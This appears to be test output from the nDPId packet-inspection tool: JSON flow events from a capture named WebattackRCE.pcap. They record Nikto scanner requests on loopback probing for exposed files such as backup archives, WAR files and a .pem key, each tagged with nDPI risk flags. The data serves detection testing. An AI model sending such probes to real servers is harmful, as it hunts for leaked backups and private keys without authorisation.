00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
